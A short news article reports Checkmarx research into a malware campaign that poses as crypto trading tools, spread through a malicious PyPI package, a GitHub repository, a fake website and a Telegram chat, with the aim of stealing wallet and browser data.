A new malware, disguised as a suite of crypto trading tools, has been discovered attempting to steal sensitive data and drain victims' wallets.
Researchers at cybersecurity firm Checkmarx reported that the invasive malware campaign was orchestrated through multiple attack vectors, including a malicious Python package named "CryptoAITools" on PyPI (Python Package Index) and a deceptive GitHub repository named "Meme-Token-Hunter-Bot." The malware targeted both macOS and Windows users.
According to the researchers, a deceptive graphical user interface distracts victims, while the malware employs a multi-stage infection process. It used a fake website, coinsw.app – which pretends to be a legitimate crypto trading bot service – to host and deliver second-stage payloads.
"The malware displayed extensive data theft capabilities focused on cryptocurrency-related information, including wallet data, browser data, and sensitive system files," Checkmarx explained, adding that "the true scope of the attack may be larger than initially thought."
The researchers noted that users who starred or forked the malicious "Meme-Token-Hunter-Bot" repository are potential victims, "significantly expanding the attack's reach."
No estimations of potential losses have been provided.
The research also found that the attacker employed multiple infection vectors and social engineering tactics. They operated a Telegram chat called "Pancakeswap prediction bot," where the attacker directly engaged with potential victims.
According to the researchers in the chat, the attacker offered "bot support" to establish credibility and trust. Later, they reportedly lured victims by proposing a free trial period followed by a monthly subscription model. To further legitimize the service, they personalized the experience by offering customized configuration options and continuous support.
"This multi-platform approach allows the attacker to cast a wide net, potentially reaching victims who might be cautious about one platform but trust another," the researchers concluded, adding that "this attack erodes trust in cryptocurrency tools and platforms."
Your email address will not be published. Required fields are markedmarked